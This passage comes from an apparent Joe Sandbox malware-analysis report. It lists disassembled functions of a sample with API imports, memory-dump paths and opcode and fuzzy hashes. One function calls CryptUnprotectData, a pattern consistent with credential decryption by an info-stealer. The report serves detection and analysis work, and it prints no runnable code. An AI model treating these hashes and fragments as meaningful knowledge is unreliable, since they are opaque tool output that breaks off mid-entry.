                                    • Instruction Fuzzy Hash: 55313271A40615AFD710DB94CC91FAAB7B9EB88B10F104294FA14EB3D0D7B0AE45CB90
                                    Function 008C9BE0 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008C9BFF
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 008C9C13
                                    • LocalFree.KERNEL32(?), ref: 008C9C37
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 485da97e9401b74ba98f94b55551f6369a2f7106e41314209e53885c1a0f8ee0
                                    • Instruction ID: 864fa15afca66360d9e4838f33c1e077c28ffe06722b6a04da255fad17b2699d
                                    • Opcode Fuzzy Hash: 485da97e9401b74ba98f94b55551f6369a2f7106e41314209e53885c1a0f8ee0
                                    • Instruction Fuzzy Hash: B501FF75A413096BE710DBE4DC45FBAB778EB44700F104558EA04AB280D7B09901CBD5
                                    Function 00C7F77E Relevance: 3.7, Strings: 2, Instructions: 1227COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: "b_M$+B>
                                    • API String ID: 0-3685272674
                                    • Opcode ID: e2e615b30b8b81ace0e5d5f3e0bba80d77cf9a310de19528f4483548617b7125
                                    • Instruction ID: b1ba5f2eb5b997b1acaefaf7c3116cbe3ddb03ee0d6b2546d619980ae4ddb93a
                                    • Opcode Fuzzy Hash: e2e615b30b8b81ace0e5d5f3e0bba80d77cf9a310de19528f4483548617b7125
                                    • Instruction Fuzzy Hash: 3F82E4F260C2049FE304AF29EC8567AFBE5EF94720F16893DE6C583740EA3558448B97
                                    Function 008E3190 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoSystemwsprintf
                                    • String ID:
                                    • API String ID: 2452939696-0
                                    • Opcode ID: 6b17983c8e71949c7222627b77fbbfc63bea7b810e6993a942734212737143ae
                                    • Instruction ID: 852fbb2061d1493d3cb0e3d2cc24a326e8eb8af5d75989039824cc1da833e8ca
                                    • Opcode Fuzzy Hash: 6b17983c8e71949c7222627b77fbbfc63bea7b810e6993a942734212737143ae
                                    • Instruction Fuzzy Hash: A4F06DB1940608AFCB10CB84EC45BA9B77DFB48A20F40466AEA15D2380DB782904CBA1
                                    Function 00C3F0EA Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: W.Fs
                                    • API String ID: 0-711085032
                                    • Opcode ID: b575b6466521229ecd5b9970de9203aef5fd23cec3456c42de838579b91e033e
                                    • Instruction ID: dc0aae5d0b69747bfa966f1896fabd8323c137469eef3942b8330b3cf47509ba
                                    • Opcode Fuzzy Hash: b575b6466521229ecd5b9970de9203aef5fd23cec3456c42de838579b91e033e
                                    • Instruction Fuzzy Hash: 825134F3A086149FF3046D28DC9577ABAD9EB84320F1A463EEE8593780E9395C044296
                                    Function 00C4C557 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $%
                                    • API String ID: 0-562803315
                                    • Opcode ID: 337b0f0f5ea1cefa8256a704702e59340ce505aef53af78b12bdcba4b826f1ea
                                    • Instruction ID: 3dd95b2cb02174d13875b3411c06003b5394191476e5b708bdbbf7f0374278e1
                                    • Opcode Fuzzy Hash: 337b0f0f5ea1cefa8256a704702e59340ce505aef53af78b12bdcba4b826f1ea
                                    • Instruction Fuzzy Hash: 555135F3D040205BF7585D39DD193767A96DBD0720F2BC23DAB98A77C8E93A580982C5
                                    Function 00D499D7 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 4z,
                                    • API String ID: 0-3202762787
                                    • Opcode ID: 22dd380f0305766ded97704cb05ecc17f02397f5783c17123e1cab8f4663b7fe
                                    • Instruction ID: ae30e33ac17f38514853808c78274a15dd193def97fedcc6920aea22d5d9d33e
                                    • Opcode Fuzzy Hash: 22dd380f0305766ded97704cb05ecc17f02397f5783c17123e1cab8f4663b7fe
                                    • Instruction Fuzzy Hash: 3C5128B250C714DFC3107E2AD89667BF7E5EF94720F26492DE6C583200EA309840DBA7
                                    Function 00C778F0 Relevance: .6, Instructions: 573COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 442eb04da5e9a7ba6d7ddd8f3251704623ce44f98cdec201135db14a28217b62
                                    • Instruction ID: 498ae92fa704c529b75f6fcc84107960e76dfd85960463a8fee935ce143fbb1c
                                    • Opcode Fuzzy Hash: 442eb04da5e9a7ba6d7ddd8f3251704623ce44f98cdec201135db14a28217b62
                                    • Instruction Fuzzy Hash: 0102D4F390C204AFE704AE2DEC8566AFBE9EFD4720F16853DE6C487744E63598058692
                                    Function 00C6069F Relevance: .2, Instructions: 215COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9d1503511986939dd8dfb3f04af23865657c55081de2a9b556e8a873101e4074
                                    • Instruction ID: a6510adff57b8a188df2277a420da6ec38c8ce5674addcce610d0742f87d4433
                                    • Opcode Fuzzy Hash: 9d1503511986939dd8dfb3f04af23865657c55081de2a9b556e8a873101e4074
                                    • Instruction Fuzzy Hash: 9461C7F390C3109FE3146E19EC8076AF7EAEFD4720F16853DEAC897384E67558418696
                                    Function 00B4D075 Relevance: .2, Instructions: 213COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 992c04ad63dcd83ac91fc2890d852961bbe7170ccd2174198788c07dce52c143
                                    • Instruction ID: 363a494981744fda40a1288ddca8bd37382d719ff6e345d0b66f1d8f276f2a60
                                    • Opcode Fuzzy Hash: 992c04ad63dcd83ac91fc2890d852961bbe7170ccd2174198788c07dce52c143
                                    • Instruction Fuzzy Hash: D76116F3E086045FF3049E29EC4977BBBD5DF94720F1A863DEA88D3780E97958048696
                                    Function 00B6C525 Relevance: .2, Instructions: 199COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c373859e27ae034c69c48ff691d774c30d0074a65b1ebd1de79f8954fbb754ac
                                    • Instruction ID: f9c3c54ea2c32b541b200b8e19c1d82290b47460c9154c457d64625a207e306d
                                    • Opcode Fuzzy Hash: c373859e27ae034c69c48ff691d774c30d0074a65b1ebd1de79f8954fbb754ac
                                    • Instruction Fuzzy Hash: 8F5125F3A182045FE704AE29DD9873BB7E9EB84320F17463CDEC8D3784E93958058696
                                    Function 00C05DC8 Relevance: .2, Instructions: 183COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ddb1ec970b6608546ecdf42a1fe3f7903434ed33574d3d6c2683fb5f5893fef7
                                    • Instruction ID: 3ce2539386dffa2524485e3c80bfce35722478fc3589b04e488c35a9c700584f
                                    • Opcode Fuzzy Hash: ddb1ec970b6608546ecdf42a1fe3f7903434ed33574d3d6c2683fb5f5893fef7
                                    • Instruction Fuzzy Hash: 8D5188F3A083045BE3046E2EEC8473AFBEADBD5724F1B463DD6C983740E83958058252
                                    Function 00B87295 Relevance: .2, Instructions: 174COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f1447cad53cfe4802975df6622242dfd68cbf712ba074a0cbda84c2dfe240f41
                                    • Instruction ID: 082ac9ea2a8ac93cca0e6c942ed923592066d86ab29672e8d87530767b4cecd2
